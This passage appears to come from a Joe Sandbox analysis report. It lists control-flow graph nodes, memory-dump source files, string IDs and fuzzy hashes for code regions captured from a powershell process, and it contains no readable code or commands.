2234->2248 2238 72c2e21 2236->2238 2239 72c2e13-72c2e1f 2236->2239 2246 72c2e23-72c2e25 2238->2246 2239->2246 2246->2203 2251 72c2e2b-72c2e43 2246->2251 2254 72c2ff5 2247->2254 2255 72c2ff7-72c3003 2247->2255 2262 72c301e-72c3077 2248->2262 2256 72c3126 2249->2256 2250->2256 2259 72c2e5d-72c2e75 2251->2259 2260 72c2e45-72c2e4b 2251->2260 2254->2248 2255->2248 2269 72c2e7c-72c2e7e 2259->2269 2263 72c2e4d 2260->2263 2264 72c2e4f-72c2e5b 2260->2264 2263->2259 2264->2259 2270 72c2e96-72c2eed 2269->2270 2271 72c2e80-72c2e86 2269->2271 2273 72c2e88 2271->2273 2274 72c2e8a-72c2e8c 2271->2274 2273->2270 2274->2270
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$]$$^q$$^q$$^q
                                                            • API String ID: 0-2994288445
                                                            • Opcode ID: 520604f5c3c14d215a9bb3765b247abbf3056fe42e813b9a003a93f0965236f7
                                                            • Instruction ID: 7371227b301b323a860a4f93159b398eaac362637cc4ba8656a274be90de2556
                                                            • Opcode Fuzzy Hash: 520604f5c3c14d215a9bb3765b247abbf3056fe42e813b9a003a93f0965236f7
                                                            • Instruction Fuzzy Hash: D39149B1B2434ACFDB15DA38880066ABBE5BFA6210F1485BFD005CB256DF32D946C793

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2275 72c2238-72c225d 2276 72c245b-72c2490 2275->2276 2277 72c2263-72c2268 2275->2277 2285 72c24a0 2276->2285 2286 72c2492-72c249e 2276->2286 2278 72c226a-72c2270 2277->2278 2279 72c2280-72c2284 2277->2279 2280 72c2274-72c227e 2278->2280 2281 72c2272 2278->2281 2283 72c228a-72c228c 2279->2283 2284 72c240b-72c2415 2279->2284 2280->2279 2281->2279 2287 72c229c 2283->2287 2288 72c228e-72c229a 2283->2288 2289 72c2417-72c2420 2284->2289 2290 72c2423-72c2429 2284->2290 2292 72c24a2-72c24a4 2285->2292 2286->2292 2293 72c229e-72c22a0 2287->2293 2288->2293 2294 72c242f-72c243b 2290->2294 2295 72c242b-72c242d 2290->2295 2296 72c251f-72c2529 2292->2296 2297 72c24a6-72c24b1 2292->2297 2293->2284 2298 72c22a6-72c22c5 2293->2298 2299 72c243d-72c2458 2294->2299 2295->2299 2300 72c252b-72c2532 2296->2300 2301 72c2535-72c253b 2296->2301 2302 72c24cf 2297->2302 2303 72c24b3-72c24b9 2297->2303 2319 72c22d5 2298->2319 2320 72c22c7-72c22d3 2298->2320 2306 72c253d-72c253f 2301->2306 2307 72c2541-72c254d 2301->2307 2308 72c24d1-72c24dd 2302->2308 2309 72c24bf-72c24cb 2303->2309 2310 72c24bb-72c24bd 2303->2310 2312 72c254f-72c256b 2306->2312 2307->2312 2308->2296 2321 72c24df-72c24e6 2308->2321 2313 72c24cd 2309->2313 2310->2313 2313->2308 2323 72c22d7-72c22d9 2319->2323 2320->2323 2324 72c24ec-72c24f1 2321->2324 2325 72c256e-72c257c 2321->2325 2323->2284 2326 72c22df-72c22e6 2323->2326 2327 72c2509-72c2512 2324->2327 2328 72c24f3-72c24f9 2324->2328 2337 72c257e-72c25a1 2325->2337 2338 72c25a3-72c25b9 2325->2338 2326->2276 2330 72c22ec-72c22f1 2326->2330 2336 72c2517-72c251c 2327->2336 2331 72c24fd-72c2507 2328->2331 2332 72c24fb 2328->2332 2334 72c2309-72c2317 2330->2334 2335 72c22f3-72c22f9 2330->2335 2331->2327 2332->2327 2334->2284 2347 72c231d-72c233a 2334->2347 2339 72c22fd-72c2307 2335->2339 2340 72c22fb 2335->2340 2337->2338 2344 72c25bf-72c25c4 2338->2344 2345 72c2748-72c279e 2338->2345 2339->2334 2340->2334 2348 72c25dc-72c25e0 2344->2348 2349 72c25c6-72c25cc 2344->2349 2347->2284 2366 72c2340-72c2365 2347->2366 2354 72c26f8-72c2702 2348->2354 2355 72c25e6-72c25e8 2348->2355 2351 72c25ce 2349->2351 2352 72c25d0-72c25da 2349->2352 2351->2348 2352->2348 2356 72c2704-72c270d 2354->2356 2357 72c2710-72c2716 2354->2357 2358 72c25f8 2355->2358 2359 72c25ea-72c25f6 2355->2359 2364 72c271c-72c2728 2357->2364 2365 72c2718-72c271a 2357->2365 2363 72c25fa-72c25fc 2358->2363 2359->2363 2363->2354 2367 72c2602-72c2621 2363->2367 2368 72c272a-72c2745 2364->2368 2365->2368 2366->2284 2380 72c236b-72c23a2 2366->2380 2378 72c2640 2367->2378 2379 72c2623-72c263e 2367->2379 2381 72c2642-72c2644 2378->2381 2379->2381 2394 72c23bc-72c2408 2380->2394 2395 72c23a4-72c23aa 2380->2395 2381->2354 2383 72c264a-72c2654 2381->2383 2385 72c2656-72c2671 2383->2385 2386 72c26b2-72c26e5 2383->2386 2391 72c268b-72c2696 2385->2391 2392 72c2673-72c2679 2385->2392 2411 72c26ec-72c26f5 2386->2411 2404 72c26ae-72c26b0 2391->2404 2405 72c2698-72c269e 2391->2405 2396 72c267d-72c2689 2392->2396 2397 72c267b 2392->2397 2399 72c23ac 2395->2399 2400 72c23ae-72c23ba 2395->2400 2396->2391 2397->2391 2399->2394 2400->2394 2404->2411 2408 72c26a0 2405->2408 2409 72c26a2-72c26a4 2405->2409 2408->2404 2409->2404
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: 8efcb489fe5a50dcef2409e40721111224379b0a30b6e5f289577e1cd06ebdd6
                                                            • Instruction ID: 95bf945d94d1aba2be447ec667374826a290ad6c30737a3ba3f1db9d8806a149
                                                            • Opcode Fuzzy Hash: 8efcb489fe5a50dcef2409e40721111224379b0a30b6e5f289577e1cd06ebdd6
                                                            • Instruction Fuzzy Hash: A7E126B1724306CFDB25CB78981066ABBE6BFA5210F1885AED505CF395DE32C845C7A3

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2415 72c2830-72c2856 2416 72c285c-72c2861 2415->2416 2417 72c29bf-72c29ef 2415->2417 2418 72c2879-72c287d 2416->2418 2419 72c2863-72c2869 2416->2419 2427 72c2a19-72c2a34 2417->2427 2428 72c29f1-72c29f6 2417->2428 2420 72c296e-72c2978 2418->2420 2421 72c2883-72c2885 2418->2421 2423 72c286d-72c2877 2419->2423 2424 72c286b 2419->2424 2429 72c297a-72c2983 2420->2429 2430 72c2986-72c298c 2420->2430 2425 72c2895 2421->2425 2426 72c2887-72c2893 2421->2426 2423->2418 2424->2418 2431 72c2897-72c2899 2425->2431 2426->2431 2443 72c2ab4-72c2ada 2427->2443 2444 72c2a36-72c2a6f 2427->2444 2432 72c2a0e-72c2a10 2428->2432 2433 72c29f8-72c29fe 2428->2433 2434 72c298e-72c2990 2430->2434 2435 72c2992-72c299e 2430->2435 2431->2420 2438 72c289f-72c28a1 2431->2438 2442 72c2a17-72c2a18 2432->2442 2439 72c2a00 2433->2439 2440 72c2a02-72c2a0c 2433->2440 2441 72c29a0-72c29bc 2434->2441 2435->2441 2445 72c28b1 2438->2445 2446 72c28a3-72c28af 2438->2446 2439->2432 2440->2432 2457 72c2adc-72c2afb 2443->2457 2458 72c2b03-72c2b0a 2443->2458 2449 72c2a87-72c2aac 2444->2449 2450 72c2a71-72c2a77 2444->2450 2451 72c28b3-72c28b5 2445->2451 2446->2451 2449->2443 2454 72c2a79 2450->2454 2455 72c2a7b-72c2a85 2450->2455 2451->2420 2456 72c28bb-72c28bd 2451->2456 2454->2449 2455->2449 2460 72c28bf-72c28c5 2456->2460 2461 72c28d7-72c296b 2456->2461 2457->2458 2463 72c2c9b-72c2cc8 2458->2463 2464 72c2b10-72c2b15 2458->2464 2466 72c28c9-72c28d5 2460->2466 2467 72c28c7 2460->2467 2500 72c2ccd-72c2ce1 2463->2500 2470 72c2b2d-72c2b3c 2464->2470 2471 72c2b17-72c2b1d 2464->2471 2466->2461 2467->2461 2470->2463 2474 72c2b42-72c2b47 2470->2474 2472 72c2b1f 2471->2472 2473 72c2b21-72c2b2b 2471->2473 2472->2470 2473->2470 2478 72c2b5f-72c2b69 2474->2478 2479 72c2b49-72c2b4f 2474->2479 2478->2463 2481 72c2b6f-72c2b77 2478->2481 2483 72c2b51 2479->2483 2484 72c2b53-72c2b5d 2479->2484 2486 72c2b8f-72c2b9e 2481->2486 2487 72c2b79-72c2b7f 2481->2487 2483->2478 2484->2478 2486->2463 2492 72c2ba4-72c2bbf 2486->2492 2490 72c2b81 2487->2490 2491 72c2b83-72c2b8d 2487->2491 2490->2486 2491->2486 2498 72c2bd9-72c2bfb 2492->2498 2499 72c2bc1-72c2bc7 2492->2499 2498->2463 2510 72c2c01-72c2c06 2498->2510 2501 72c2bc9 2499->2501 2502 72c2bcb-72c2bd7 2499->2502 2504 72c2d0a-72c2d42 2500->2504 2505 72c2ce3-72c2d02 2500->2505 2501->2498 2502->2498 2505->2504 2512 72c2c1e-72c2c39 2510->2512 2513 72c2c08-72c2c0e 2510->2513 2518 72c2c3b-72c2c41 2512->2518 2519 72c2c53-72c2c99 2512->2519 2515 72c2c10 2513->2515 2516 72c2c12-72c2c1c 2513->2516 2515->2512 2516->2512 2521 72c2c45-72c2c51 2518->2521 2522 72c2c43 2518->2522 2519->2500 2521->2519 2522->2519
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: 1cd748acb114e80b3099a76392d74dc88184fe4e5328a358f0b843781742b97b
                                                            • Instruction ID: 39fd08c148e64ebf90ec2fe46d58ced6f2fadd4b95fea0fa127fec5833e2728c
                                                            • Opcode Fuzzy Hash: 1cd748acb114e80b3099a76392d74dc88184fe4e5328a358f0b843781742b97b
                                                            • Instruction Fuzzy Hash: 84E1B3B0B10206CFC714DB68C954AAABBF2BF99310F1586AAD4059F355CF31DC45CBA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-1420252700
                                                            • Opcode ID: e8ea5a5c3f3ffe62b6a9bd96ddaa0073cdc3027a03e28b9bba6d624114926aea
                                                            • Instruction ID: 32a9ea910bb34436b651bd30f9d7caacc03ff9798535eadc60e43dd2393c558f
                                                            • Opcode Fuzzy Hash: e8ea5a5c3f3ffe62b6a9bd96ddaa0073cdc3027a03e28b9bba6d624114926aea
                                                            • Instruction Fuzzy Hash: 265290B4A1021ACFCB14DB58C950B9ABBB2FF95300F14C6A9D409AB355CB71ED85CF92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2720 72c2d55-72c2d9d 2723 72c2f43-72c2f8a 2720->2723 2724 72c2da3-72c2da8 2720->2724 2730 72c30c8-72c30e8 2723->2730 2731 72c2f90-72c2f95 2723->2731 2725 72c2daa-72c2db0 2724->2725 2726 72c2dc0-72c2dcc 2724->2726 2728 72c2db4-72c2dbe 2725->2728 2729 72c2db2 2725->2729 2733 72c2ef0-72c2efa 2726->2733 2734 72c2dd2-72c2dd5 2726->2734 2728->2726 2729->2726 2751 72c30ea-72c3116 2730->2751 2752 72c3085-72c308e 2730->2752 2735 72c2fad-72c2fb1 2731->2735 2736 72c2f97-72c2f9d 2731->2736 2739 72c2efc-72c2f05 2733->2739 2740 72c2f08-72c2f0e 2733->2740 2734->2733 2738 72c2ddb-72c2de2 2734->2738 2743 72c307a-72c3084 2735->2743 2744 72c2fb7-72c2fb9 2735->2744 2741 72c2f9f 2736->2741 2742 72c2fa1-72c2fab 2736->2742 2738->2723 2746 72c2de8-72c2ded 2738->2746 2747 72c2f14-72c2f20 2740->2747 2748 72c2f10-72c2f12 2740->2748 2741->2735 2742->2735 2743->2752 2753 72c3091-72c3097 2743->2753 2749 72c2fc9 2744->2749 2750 72c2fbb-72c2fc7 2744->2750 2754 72c2def-72c2df5 2746->2754 2755 72c2e05-72c2e09 2746->2755 2757 72c2f22-72c2f40 2747->2757 2748->2757 2758 72c2fcb-72c2fcd 2749->2758 2750->2758 2779 72c3118 2751->2779 2780 72c311a-72c311c 2751->2780 2759 72c309d-72c30a9 2753->2759 2760 72c3099-72c309b 2753->2760 2761 72c2df9-72c2e03 2754->2761 2762 72c2df7 2754->2762 2755->2733 2766 72c2e0f-72c2e11 2755->2766 2758->2743 2764 72c2fd3-72c2feb 2758->2764 2767 72c30ab-72c30c5 2759->2767 2760->2767 2761->2755 2762->2755 2777 72c2fed-72c2ff3 2764->2777 2778 72c3005-72c300c 2764->2778 2768 72c2e21 2766->2768 2769 72c2e13-72c2e1f 2766->2769 2776 72c2e23-72c2e25 2768->2776 2769->2776 2776->2733 2781 72c2e2b-72c2e43 2776->2781 2784 72c2ff5 2777->2784 2785 72c2ff7-72c3003 2777->2785 2787 72c3013-72c3017 2778->2787 2786 72c3126 2779->2786 2780->2786 2789 72c2e5d-72c2e6b 2781->2789 2790 72c2e45-72c2e4b 2781->2790 2784->2778 2785->2778 2792 72c301e-72c3077 2787->2792 2798 72c2e72-72c2e75 2789->2798 2793 72c2e4d 2790->2793 2794 72c2e4f-72c2e5b 2790->2794 2793->2789 2794->2789 2799 72c2e7c-72c2e7e 2798->2799 2800 72c2e96-72c2eed 2799->2800 2801 72c2e80-72c2e86 2799->2801 2803 72c2e88 2801->2803 2804 72c2e8a-72c2e8c 2801->2804 2803->2800 2804->2800
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$$^q$$^q
                                                            • API String ID: 0-2291298209
                                                            • Opcode ID: e4cc04e9bbee682a4927f6e666c4987dae768eb141e8d20b615faaf8313ad42e
                                                            • Instruction ID: 4951d27a9e1b4d150c9ebdd2ec3f4344c49f27165094351df84c25a432e1c2e8
                                                            • Opcode Fuzzy Hash: e4cc04e9bbee682a4927f6e666c4987dae768eb141e8d20b615faaf8313ad42e
                                                            • Instruction Fuzzy Hash: 8D31F4B1A24387DFDB25CE25C4006667BF1BF66210F0982BED4059B156DF71E944CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: 1c5e9d1c24414702beae9c770fe8638fcd6ae8763f821f77a0bb239a60944bc5
                                                            • Instruction ID: 23a21765a33b68231ea565842a90862d7982d117338879343606982613661c85
                                                            • Opcode Fuzzy Hash: 1c5e9d1c24414702beae9c770fe8638fcd6ae8763f821f77a0bb239a60944bc5
                                                            • Instruction Fuzzy Hash: 2F4218B6B002059FCF15DF68C4446AABBE6AF85311F18C4BAD405CF291DB31D94BCBA2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3013 6bd58db-6bd58e5 3015 6bd58e7-6bd590e 3013->3015 3016 6bd5876-6bd5880 3013->3016 3017 6bd591f-6bd5928 3015->3017 3018 6bd5910-6bd591d 3015->3018 3023 6bd5889-6bd588f 3016->3023 3024 6bd5882-6bd5887 3016->3024 3018->3017 3019 6bd592b-6bd5938 3018->3019 3021 6bd593a-6bd5941 3019->3021 3022 6bd5943 3019->3022 3025 6bd594a-6bd5974 3021->3025 3022->3025 3026 6bd58ca-6bd58ce 3023->3026 3027 6bd5891-6bd58b1 3023->3027 3024->3023 3028 6bd597d-6bd5990 call 6bd55c8 3025->3028 3029 6bd5976 3025->3029 3031 6bd58ba-6bd58bc 3027->3031 3034 6bd5ad4-6bd5adb 3028->3034 3035 6bd5996-6bd59a9 3028->3035 3029->3028 3031->3026 3033 6bd58be-6bd58c5 call 6bd31b0 3031->3033 3033->3026 3037 6bd5d75-6bd5d7c 3034->3037 3038 6bd5ae1-6bd5af6 3034->3038 3046 6bd59ab-6bd59b2 3035->3046 3047 6bd59b7-6bd59d1 3035->3047 3039 6bd5d7e-6bd5d87 3037->3039 3040 6bd5deb-6bd5df2 3037->3040 3051 6bd5af8-6bd5afa 3038->3051 3052 6bd5b16-6bd5b1c 3038->3052 3039->3040 3044 6bd5d89-6bd5d9c 3039->3044 3042 6bd5e8e-6bd5e95 3040->3042 3043 6bd5df8-6bd5e01 3040->3043 3049 6bd5e97-6bd5ea8 3042->3049 3050 6bd5eb1-6bd5eb7 3042->3050 3043->3042 3048 6bd5e07-6bd5e1a 3043->3048 3044->3040 3067 6bd5d9e-6bd5de3 call 6bd2be0 3044->3067 3053 6bd5acd 3046->3053 3062 6bd59d8-6bd59e5 3047->3062 3063 6bd59d3-6bd59d6 3047->3063 3072 6bd5e2d-6bd5e31 3048->3072 3073 6bd5e1c-6bd5e2b 3048->3073 3049->3050 3074 6bd5eaa 3049->3074 3057 6bd5ec9-6bd5ed2 3050->3057 3058 6bd5eb9-6bd5ebf 3050->3058 3051->3052 3056 6bd5afc-6bd5b13 3051->3056 3059 6bd5be4-6bd5be8 3052->3059 3060 6bd5b22-6bd5b24 3052->3060 3053->3034 3056->3052 3068 6bd5ed5-6bd5f4a 3058->3068 3069 6bd5ec1-6bd5ec7 3058->3069 3059->3037 3064 6bd5bee-6bd5bf0 3059->3064 3060->3059 3061 6bd5b2a-6bd5bab call 6bd2be0 * 4 3060->3061 3136 6bd5bad-6bd5bbf call 6bd2be0 3061->3136 3137 6bd5bc2-6bd5be1 call 6bd2be0 3061->3137 3070 6bd59e7-6bd59fb 3062->3070 3063->3070 3064->3037 3071 6bd5bf6-6bd5bff 3064->3071 3067->3040 3105 6bd5de5-6bd5de8 3067->3105 3143 6bd5f4c-6bd5f56 3068->3143 3144 6bd5f58 3068->3144 3069->3057 3069->3068 3070->3053 3104 6bd5a01-6bd5a55 3070->3104 3079 6bd5d52-6bd5d58 3071->3079 3080 6bd5e51-6bd5e53 3072->3080 3081 6bd5e33-6bd5e35 3072->3081 3073->3072 3074->3050 3084 6bd5d6b 3079->3084 3085 6bd5d5a-6bd5d69 3079->3085 3080->3042 3083 6bd5e55-6bd5e5b 3080->3083 3081->3080 3088 6bd5e37-6bd5e4e 3081->3088 3083->3042 3090 6bd5e5d-6bd5e8b 3083->3090 3093 6bd5d6d-6bd5d6f 3084->3093 3085->3093 3088->3080 3090->3042 3093->3037 3097 6bd5c04-6bd5c12 call 6bd43b0 3093->3097 3111 6bd5c2a-6bd5c44 3097->3111 3112 6bd5c14-6bd5c1a 3097->3112 3146 6bd5a57-6bd5a59 3104->3146 3147 6bd5a63-6bd5a67 3104->3147 3105->3040 3111->3079 3121 6bd5c4a-6bd5c4e 3111->3121 3115 6bd5c1c 3112->3115 3116 6bd5c1e-6bd5c20 3112->3116 3115->3111 3116->3111 3123 6bd5c6f 3121->3123 3124 6bd5c50-6bd5c59 3121->3124 3129 6bd5c72-6bd5c8c 3123->3129 3127 6bd5c5b-6bd5c5e 3124->3127 3128 6bd5c60-6bd5c63 3124->3128 3132 6bd5c6d 3127->3132 3128->3132 3129->3079 3151 6bd5c92-6bd5d13 call 6bd2be0 * 4 3129->3151 3132->3129 3136->3137 3137->3059 3149 6bd5f5d-6bd5f5f 3143->3149 3144->3149 3146->3147 3147->3053 3150 6bd5a69-6bd5a81 3147->3150 3152 6bd5f66-6bd5f6b 3149->3152 3153 6bd5f61-6bd5f64 3149->3153 3150->3053 3157 6bd5a83-6bd5a8f 3150->3157 3177 6bd5d2a-6bd5d50 call 6bd2be0 3151->3177 3178 6bd5d15-6bd5d27 call 6bd2be0 3151->3178 3155 6bd5f71-6bd5f9e 3152->3155 3153->3155 3160 6bd5a9e-6bd5aa4 3157->3160 3161 6bd5a91-6bd5a94 3157->3161 3162 6bd5aac-6bd5ab5 3160->3162 3163 6bd5aa6-6bd5aa9 3160->3163 3161->3160 3165 6bd5ac4-6bd5aca 3162->3165 3166 6bd5ab7-6bd5aba 3162->3166 3163->3162 3165->3053 3166->3165 3177->3037 3177->3079 3178->3177
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q
                                                            • API String ID: 0-355816377
                                                            • Opcode ID: edd72e1aecd9cbe9f62de32a8c2f77665729e0c31b3b40915074bbd95d80535a
                                                            • Instruction ID: e3e9b7136ab7aa4baa8a8fe39d6f47a3accf1e4234a10fe8356dd84397d000e6
                                                            • Opcode Fuzzy Hash: edd72e1aecd9cbe9f62de32a8c2f77665729e0c31b3b40915074bbd95d80535a
                                                            • Instruction Fuzzy Hash: 8A326C71E102598FDB65DFA4D854ABDBBB2FF48300F148095E811AF3A4EB389E45CB60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3183 6bd2534-6bd2542 3185 6bd2544-6bd2546 3183->3185 3186 6bd2561-6bd256d 3183->3186 3187 6bd2548-6bd254e 3185->3187 3188 6bd2554-6bd255e 3185->3188 3191 6bd256f-6bd2571 3186->3191 3192 6bd2590-6bd2594 3186->3192 3187->3188 3189 6bd270e-6bd27a1 3187->3189 3191->3192 3196 6bd2573-6bd258e 3191->3196 3194 6bd259a-6bd25c0 3192->3194 3195 6bd26e2-6bd26ec 3192->3195 3202 6bd25c7-6bd25c9 3194->3202 3203 6bd25c2 3194->3203 3196->3192 3205 6bd25e9-6bd25ef 3202->3205 3206 6bd25cb-6bd25e3 3202->3206 3203->3202 3208 6bd25f9-6bd2612 3205->3208 3209 6bd25f1 3205->3209 3213 6bd25e5-6bd25e7 3206->3213 3214 6bd2617-6bd2667 call 6bd0f00 3206->3214 3210 6bd26c4-6bd26d4 3208->3210 3209->3208 3218 6bd26df-6bd26e0 3210->3218 3219 6bd26d6 3210->3219 3213->3205 3213->3214 3228 6bd268d 3214->3228 3229 6bd2669-6bd268b call 6bd0f00 3214->3229 3218->3195 3219->3218 3230 6bd2690-6bd2694 3228->3230 3229->3230 3232 6bd26af-6bd26c2 3230->3232 3233 6bd2696 3230->3233 3232->3210 3237 6bd2698 call 6bd326f 3233->3237 3238 6bd2698 call 6bd32ca 3233->3238 3239 6bd2698 call 6bd3280 3233->3239 3240 6bd2698 call 6bd3370 3233->3240 3235 6bd269e-6bd26a4 3235->3232 3237->3235 3238->3235 3239->3235 3240->3235
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #k^$+(
                                                            • API String ID: 0-3802973943
                                                            • Opcode ID: 1912fa9569dbd6f1532f629338a7f48a23d3c235821ca9d57fc5fd60f5bac088
                                                            • Instruction ID: ca24cfbd6a0f847a8b43adbbfeaed48d903b43174b0cdd254753df0616bfd177
                                                            • Opcode Fuzzy Hash: 1912fa9569dbd6f1532f629338a7f48a23d3c235821ca9d57fc5fd60f5bac088
                                                            • Instruction Fuzzy Hash: F3617D74A01248DFDB45EFB4D954BADBBB2FF88300F2440A9E6119B391EB359E41CB50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3241 6bd4f20-6bd4f32 3242 6bd4f38-6bd4f3a 3241->3242 3243 6bd5026-6bd504b 3241->3243 3244 6bd4f40-6bd4f4c 3242->3244 3245 6bd5052-6bd5076 3242->3245 3243->3245 3250 6bd4f4e-6bd4f5a 3244->3250 3251 6bd4f60-6bd4f70 3244->3251 3256 6bd507d-6bd50a1 3245->3256 3250->3251 3250->3256 3251->3256 3257 6bd4f76-6bd4f84 3251->3257 3261 6bd50a8-6bd512d call 6bd2468 3256->3261 3257->3261 3262 6bd4f8a-6bd4f8f 3257->3262 3286 6bd5132-6bd5140 call 6bd43b0 3261->3286 3295 6bd4f91 call 6bd4f20 3262->3295 3296 6bd4f91 call 6bd4f10 3262->3296 3297 6bd4f91 call 6bd5120 3262->3297 3298 6bd4f91 call 6bd5110 3262->3298 3264 6bd4f97-6bd4fe0 3279 6bd5003-6bd5023 call 6bd31b0 3264->3279 3280 6bd4fe2-6bd4ffb 3264->3280 3280->3279 3291 6bd5158-6bd515a 3286->3291 3292 6bd5142-6bd5148 3286->3292 3293 6bd514c-6bd514e 3292->3293 3294 6bd514a 3292->3294 3293->3291 3294->3291 3295->3264 3296->3264 3297->3264 3298->3264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (bq$Hbq
                                                            • API String ID: 0-4081012451
                                                            • Opcode ID: 9359ce3097a6857e7a0dd5aec2ff0f8d42ee7fb2182c5b4a9f1eed1852fec885
                                                            • Instruction ID: 4a4d9c3e06ac3af338ac06a37c9425138a361b3a6d9e481f84df489efd42ee1b
                                                            • Opcode Fuzzy Hash: 9359ce3097a6857e7a0dd5aec2ff0f8d42ee7fb2182c5b4a9f1eed1852fec885
                                                            • Instruction Fuzzy Hash: D3518A31B002158FD769AF78C854A2E77B6FF85340B2044B9DA068B3A1DE35EC06CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3299 719ecac-719ecc4 3301 719ecca-719eced 3299->3301 3302 719ed74-719edbc 3299->3302 3307 719ecef-719ecf5 3301->3307 3308 719ed07-719ed1e 3301->3308 3305 719edc2-719edc7 3302->3305 3306 719eff6-719f010 3302->3306 3309 719edc9-719edcf 3305->3309 3310 719eddf-719edeb 3305->3310 3317 719f081-719f088 3306->3317 3318 719f012-719f03c 3306->3318 3311 719ecf9-719ed05 3307->3311 3312 719ecf7 3307->3312 3314 719edd1 3309->3314 3315 719edd3-719eddd 3309->3315 3327 719efa1-719efab 3310->3327 3328 719edf1-719edf4 3310->3328 3311->3308 3312->3308 3314->3310 3315->3310 3322 719f08a-719f08c 3317->3322 3323 719f096-719f0ac 3317->3323 3324 719f04c 3318->3324 3325 719f03e-719f04a 3318->3325 3322->3323 3329 719f04e-719f050 3324->3329 3325->3329 3330 719efb9-719efbf 3327->3330 3331 719efad-719efb6 3327->3331 3328->3327 3332 719edfa-719ee01 3328->3332 3333 719f0af-719f0b9 3329->3333 3334 719f052-719f059 3329->3334 3335 719efc1-719efc3 3330->3335 3336 719efc5-719efd1 3330->3336 3332->3306 3337 719ee07-719ee0c 3332->3337 3338 719f0bb-719f0d7 3333->3338 3339 719f0da-719f0e0 3333->3339 3340 719f05f-719f064 3334->3340 3341 719f114-719f15a 3334->3341 3342 719efd3-719eff3 3335->3342 3336->3342 3343 719ee0e-719ee14 3337->3343 3344 719ee24-719ee28 3337->3344 3346 719f0e2-719f0e4 3339->3346 3347 719f0e6-719f0f2 3339->3347 3348 719f07c-719f080 3340->3348 3349 719f066-719f06c 3340->3349 3362 719f278-719f2c2 3341->3362 3363 719f160-719f165 3341->3363 3351 719ee18-719ee22 3343->3351 3352 719ee16 3343->3352 3344->3327 3345 719ee2e-719ee32 3344->3345 3354 719ee72 3345->3354 3355 719ee34-719ee45 3345->3355 3357 719f0f4-719f111 3346->3357 3347->3357 3348->3317 3348->3333 3358 719f06e 3349->3358 3359 719f070-719f07a 3349->3359 3351->3344 3352->3344 3360 719ee74-719ee76 3354->3360 3355->3306 3372 719ee4b-719ee50 3355->3372 3358->3348 3359->3348 3360->3327 3371 719ee7c-719ee83 3360->3371 3383 719f2c8-719f2cd 3362->3383 3384 719f3bf-719f3f8 3362->3384 3369 719f17d-719f181 3363->3369 3370 719f167-719f16d 3363->3370 3378 719f22a-719f234 3369->3378 3379 719f187-719f189 3369->3379 3374 719f16f 3370->3374 3375 719f171-719f17b 3370->3375 3376 719ee89-719ee8e 3371->3376 